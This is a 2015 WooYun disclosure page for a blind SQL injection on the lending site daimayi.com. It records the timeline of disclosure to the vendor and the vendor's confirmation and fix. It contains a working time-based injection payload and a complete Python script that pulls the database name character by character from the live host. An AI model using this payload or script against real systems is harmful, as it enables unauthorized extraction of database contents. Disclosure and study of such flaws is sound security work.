当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122590

漏洞标题:贷蚂蚁主站sql盲注漏洞(附验证脚本可获取部分数据)

相关厂商:daimayi.com

漏洞作者: depycode

提交时间:2015-06-25 10:34

修复时间:2015-08-09 20:34

公开时间:2015-08-09 20:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认,细节仅向厂商公开
2015-07-05: 细节向核心白帽子及相关领域专家公开
2015-07-15: 细节向普通白帽子公开
2015-07-25: 细节向实习白帽子公开
2015-08-09: 细节向公众公开

简要描述:

RT..

详细说明:

url:http://www.daimayi.com/index.php/Loan/index/s/1/money/1/deadline/1/lt/1/co_id/1


这里存在sql注入.

payload:if(ascii(substring(database(),%s,1))=%s),1,sleep(5))


该处因为如果将sleep放在中间会导致直接允许非常长的时间,或者504,所以我将sleep放在最后,然后通过判断页面响应内容中是否存在关键字即可。这里选取关键字 1140.00

2.png


注入:

1.png


database:huomayi


python 脚本:

#encoding=gbk
import httplib
import time
import string
import sys
import random
import urllib
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_lowercase)
for i in range(0,10):
payloads.append(str(i))
payloads += ['@','_', '.', '-', '\\', ' ']
print 'Try to retrive database:'
for i in range(1,11):
for payload in payloads:
try:
conn = httplib.HTTPConnection('www.daimayi.com', timeout=5)
s = "if(ascii(substring(database(),%s,1))=%s,1,sleep(5))" % (i, ord(payload))
params = urllib.quote(s)
conn.request(method='GET', url= '/index.php/Loan/index/s/1/money/1/deadline/1/lt/1/co_id/' + params,
headers = headers)
html_doc = conn.getresponse().read()
#print html_doc
verfy = "1140.00"
if verfy in html_doc:
print payload
break
else:
pass

except Exception, e:
pass
print "Done"

漏洞证明:

1.png

修复方案:

过滤.

版权声明:转载请注明来源 depycode@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-06-25 20:33

厂商回复:

非常感谢您的提醒,已经开始解决!祝您一切顺利!

最新状态:

2015-06-29:网站漏洞已经修复!